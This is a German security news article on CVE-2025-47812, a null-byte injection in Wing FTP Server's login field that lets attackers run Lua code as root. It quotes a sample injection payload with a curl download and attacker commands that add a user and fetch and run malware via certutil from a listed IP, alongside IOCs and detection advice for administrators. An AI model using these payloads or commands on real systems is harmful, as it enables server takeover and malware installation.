CVE-2025-47812: Kritische Schwachstelle in Wing FTP Server wird aktiv ausgenutzt

Juli 13, 2025

Monika Schmidt

Eine aktiv ausgenutzte Schwachstelle in Wing FTP Server (CVE-2025-47812) ermöglicht Remote-Code-Ausführung mit Root-Rechten über manipulierte Logins.

Inhaltsübersicht

Primary Item (H2)Sub Item 1 (H3)Sub Item 2 (H4)
Sub Item 3 (H5)
Sub Item 4 (H6)

Ein schwerwiegender Sicherheitsvorfall betrifft derzeit zehntausende Systeme weltweit: Über eine kritische Schwachstelle in der Datenübertragungssoftware Wing FTP Server (CVE-2025-47812, CVSS 10.0) verschaffen sich Angreifer die Möglichkeit, ausführbaren Lua-Code direkt in Session-Dateien einzuschleusen. Der Exploit nutzt eine fehlerhafte Verarbeitung von Null-Bytes in der Webschnittstelle und ermöglicht es, diesen Code bei regulären Seitenaufrufen automatisch mit Root- oder SYSTEM-Rechten auszuführen – ohne Authentifizierung und teilweise sogar über anonyme FTP-Konten. Die Sicherheitsfirma Huntress hat bereits dokumentierte Angriffe analysiert, bei denen gezielt Backdoors installiert und Fernzugriffe vorbereitet wurden. Renewz.de berichtet darüber unter Berufung auf technische Analysen von The Hacker News.

Technische Ursache der Schwachstelle

Das Webinterface von Wing FTP verarbeitet Null-Bytes (\0) im username-Feld nicht korrekt. Dies ermöglicht eine sogenannte Null-Byte-Injection, bei der nachfolgender Code beim Erstellen der Session-Datei als Lua-Befehl gespeichert wird.

Die so erzeugte Datei wird beim nächsten Zugriff auf Weboberflächen wie dir.html deserialisiert und automatisch ausgeführt.

Beispielhafter Payload

luaKopierenBearbeitenusername=anonymous%00local cmd=io.popen("curl -o C:\\1.bat http://bösartige.url") ...

Funktionsweise des Angriffs (aus realen Fällen dokumentiert)

Angreifer verbinden sich anonym mit dem FTP-Server.
Sie senden einen Login-Request mit %00 im Benutzernamen.
Die Session-Datei wird mit Lua-Code gespeichert.
Ein Aufruf von dir.html führt die Datei aus.
Systembefehle werden mit Root-Rechten ausgeführt.

Beispielhafte Kommandos

cmdKopierenBearbeitennet user wingftp 123123qweqwe /add
certutil -urlcache -f http://185.196.9.225:8080/malware.exe %TEMP%\x.exe
start /B %TEMP%\x.exe

Hinweise auf Kompromittierung

1. Session-Dateien prüfen:

Pfad:

pgsqlKopierenBearbeitenC:\Program Files (x86)\Wing FTP Server\session\

Auffällig sind .lua-Dateien mit:

überdurchschnittlicher Größe
eingebetteten Lua-Funktionen
hex-kodierten Strings, z. B. 6365727475...

2. Log-Dateien analysieren

Pfad:

pgsqlKopierenBearbeitenC:\Program Files (x86)\Wing FTP Server\Log\Domains\<DOMAIN>\

Verdächtige Einträge:

rustKopierenBearbeitenUser 'anonymous         ← abgeschnitten durch \0

3. Verdächtige IP-Adressen (IOCs)

185.196.9.225
223.160.131.104
149.248.44.88

4. URLs für Nachladeversuche

http://185.196.9.225:8080/EOp45eWL...
https://webhook.site/... (zur Infektionskontrolle)

Empfehlungen für Systemadministratoren

Sofortmaßnahmen

Aktualisieren Sie Wing FTP Server auf Version 7.4.4 oder höher.
Deaktivieren Sie anonyme FTP-Zugänge, sofern nicht notwendig.
Sichern Sie alle .lua-Dateien im session-Verzeichnis.
Durchsuchen Sie die Log-Dateien gezielt nach:
- abgeschnittenen Logins
- unbekannten Nutzern
- neuen Admin-Konten

Forensische Werkzeuge

Dateiüberprüfung mit findstr, grep, PowerShell:

powershellKopierenBearbeitenGet-ChildItem *.lua | Where-Object { $_.Length -gt 10KB }

Strings aus Lua-Dateien extrahieren:

bashKopierenBearbeitenstrings suspicious_file.lua | grep -i "cmd.exe"

Langfristige Maßnahmen

Maßnahme	Empfehlung
Webinterface absichern	Zugriff nur über VPN oder IP-Whitelist
Session-Verzeichnis überwachen	Einbindung in SIEM/EDR
Verdächtige Lua-Dateien isolieren	z. B. durch Hash-Vergleich in Watchdog-Skripten
Monitoring auf Netzwerkzugriffe	z. B. per `Wireshark`, `Zeek`, `Suricata`

Typische Angriffsverläufe

Huntress dokumentierte folgende Muster:

Angriffe begannen 1 Tag nach Offenlegung der Schwachstelle.
Angreifer installierten Tools wie ScreenConnect und versuchten Zugriff auf cmd.exe, curl, whoami, nslookup.
Angriffe schlugen teils fehl durch Defender oder Syntaxfehler (c:^A.exe).

Betroffene Infrastruktur

Laut Censys sind weltweit über 8.000 Wing FTP Server öffentlich erreichbar, davon mehr als 5.000 mit aktivem Webinterface. Verteilung:

USA: 31 %
Deutschland: 13 %
China, Indien, UK: je 8–10 %

Viele dieser Server laufen bei:

Webhosting-Anbietern
Mittelständischen Unternehmen
Systemhäusern mit automatisiertem Dateiaustausch

Einschätzung aus Sicht der Cybersicherheit

Diese Schwachstelle gehört zur gefährlichsten Klasse: Remote Code Execution ohne Authentifizierung. Besonders gefährlich ist der automatisierte Trigger über legitime Webrequests und die Möglichkeit, vollständig persistente Backdoors zu etablieren.

Besonderheit: Die Exploits lassen sich in weniger als einer Minute manuell reproduzieren – selbst für unerfahrene Angreifer.

Administratoren, die Wing FTP einsetzen, müssen sofort aktiv werden. Die Kombination aus technischer Einfachheit, kritischer Auswirkung und aktiver Ausnutzung macht CVE-2025-47812 zu einer realen Bedrohung. Unmittelbares Patchen, Log-Analyse und Netzwerkkontrolle sind zwingend notwendig.

Bleiben Sie informiert! Lesen Sie auch - „Chwoot“-Lücke In Sudo: Wie Ein Unsichtbarer Fehler Millionen Linux-Systeme Bedroht